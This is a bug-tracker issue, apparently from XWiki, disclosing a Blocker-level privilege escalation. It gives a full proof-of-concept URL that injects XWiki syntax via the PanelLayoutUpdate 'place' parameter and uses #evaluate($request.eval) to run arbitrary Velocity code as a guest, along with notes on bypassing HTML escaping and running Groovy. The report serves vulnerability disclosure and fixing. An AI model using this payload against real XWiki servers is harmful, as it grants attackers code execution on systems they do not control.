Details
-
Bug
-
Resolution: Solved By
-
Blocker
-
3.2 M1
-
Unit
-
Unknown
-
N/A
-
N/A
-
Description
Steps to reproduce:
As guest or logged-in user without wiki admin right, open <xwiki-host>/xwiki/bin/view/Panels/PanelLayoutUpdate?place=%7B%7B%2Fhtml%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bvelocity%7D%7D%23evaluate(%24request.eval)%7B%7B%2Fvelocity%7D%7D%7B%7B%2Fasync%7D%7D&eval=Hello%20from%20URL%20Parameter!%20I%20got%20programming%3A%20%24services.security.authorization.hasAccess(%27programming%27) where <xwiki-host> is the URL of your XWiki installation.
Expected result:
A message
You are not admin on this place {{/html}}{{async async=false}}{{velocity}}#evaluate($request.eval){{/velocity}}{{/async}}.
is displayed:
Actual result:
The message
You are not admin on this place Hello from URL Parameter! I got programming: true.</p>
</div> </div>{{/html}}
is displayed:
This demonstrates a privilege escalation from view right on Panels.PanelLayoutUpdate - by default visible for guests - to programming right due to XWiki syntax injection. Note that while the XWiki syntax is subject to HTML escaping, the above URL demonstrates how to circumvent this limitation by using #evaluate($request.eval). With this trick, arbitrary Velocity code can be executed. The same attack vector also allows to execute Groovy code but with the same limitation of HTML escaping. Again, evaluation can be used to circumvent the limitation in case it should be an issue.
This vulnerability most likely exists since XWiki 3.2 M1 when, as part of, XWIKI-6504 this code was converted to XWiki syntax 2.0.
Attachments
Issue Links
- is related to
-
-
- Closed
-